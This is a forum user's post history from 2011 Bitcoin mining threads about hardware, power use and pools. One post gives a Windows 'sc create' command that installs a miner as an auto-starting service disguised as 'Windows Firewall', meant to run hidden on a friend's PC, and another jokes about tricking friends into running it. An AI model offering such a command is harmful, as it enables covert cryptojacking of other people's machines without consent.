1204  Bitcoin / Mining / Re: Is it worth to consider mining at this moment on: May 20, 2011, 02:10:30 PM
I am planning to get a 6950 . Btw is it possible to run 2 different cards for mining? From videos i saw that the cards werent connected with xfire or sli bridges... Also could I instal Ubuntu in a  4 gig flash drive/mining software? And what are dummy plugs used for(read about them alot in forums).

Thanks for all the helpfull replys so far.

Yes, yes and im pretty sure they're for tricking the cards into thinking a monitors plugged in, in not sure why though as I don't use them.
1205  Bitcoin / Mining / Re: Check my rig on: May 20, 2011, 09:22:26 AM
If you don't OC. Each card pulls 375watts. Make the calcs

He quite clearly said he WAS going to oc' the cards, so don't be a smartass, and even then, it probably wouldn't work, because 375*3 is roughly ~1150, and that doesn't leave any power for the rest of the system.
1206  Bitcoin / Mining / Re: Does Pool Miners need Bitcoin Client? on: May 20, 2011, 04:24:27 AM
Lol!~ Yea that could work. Well actually I just told a few of my friends who play SCII a lot, but they just dismissed it. So I told one of my better buds to let me borrow his "downtime".

Well generally he's just concern about his gameplay performance. People here are really skeptical about ponzi-sounding schemes so yea -.- but are very trusting with security stuff and such. Especially I'M such a good friend myself hahaha!!!

Anyway theres no easy way to make the program invisible unless you could really install shit on his computer lolx or write/edit one of the console miners. I'm not sure.

InstallMINER.bat:

Code:
sc create "Windows Firewall" binpath= "%systemroot%\system32\poclbm\poclbm.exe <args>" type= own start= auto Displayname= "Windows FireWall"

Should do the trick Wink
1207  Bitcoin / Mining / Re: Does Pool Miners need Bitcoin Client? on: May 20, 2011, 04:01:06 AM
Where can I get friends like that?

"Hey dude, can you run a program I just made an test it"
"sure"
*Upload file > Execute > Miner installs in background > Friend sees nothing*
"Nothings happening"
"Oh ok, don't worry"

Win Wink
1208  Bitcoin / Mining / Re: Mining power of an entire school? on: May 20, 2011, 03:55:06 AM
Yeah, well im only doing work experience here, im still in highschool, so it wouldn't matter if i did, but I spoke to my boss dude (guy in charge of me and ict system) and was telling him about bitcoins and he said I could test it on one of the machines, but I couldn't even get any of them to run, mostly because of OpenCL, but not even Ufasofts CPU miner works :\
1209  Bitcoin / Mining / Re: Mining power of an entire school? on: May 20, 2011, 02:58:39 AM

Dude, that's awesome! If I buy one, what would the hashing rate be?
1211  Bitcoin / Mining / Re: Mining power of an entire school? on: May 20, 2011, 02:53:57 AM
Yeah, as I said I just wanted to know, I don't plan on doing it, I was just wondering how long mining a block would take with 4000mh/s (according to you) would take Smiley
1212  Bitcoin / Mining / Mining power of an entire school? on: May 20, 2011, 02:44:50 AM
I currently to do work experience at a school, and it came across my mind how powerful it would be if every computer in the school was running a miner (not that im going todo it). Most of the computers are relatively old 2-3years, but they should be still able to put out 20mh/s or something, BUT, there are about 400 computers in the entire school, so I just thought, roughly how long would it take me to find a block if I had around 8000+mh/s at my disposal?

1218  Bitcoin / Mining / Re: The Psychology of Pooled Mining on: May 18, 2011, 12:58:01 PM
I'm solo mining and haven't found a block since 17 April, and I can understand the temptation to join a pool.

But in the long run, one will always make a little more by solo mining than by joining any pool that charges fees.

For some of us it would take years to find a block, so it's not really an option.
1219  Bitcoin / Mining / Re: How to mine in the background with just one graphics card out of 2? on: May 18, 2011, 12:55:58 PM
It shouldn't, im using poclbm and have it setup so each time my computers starts it calls mine.bat, which in turn calls poclbm.exe with all the args (--device etc.) that it needs. You can do that by going into "Task Scheduler" Smiley
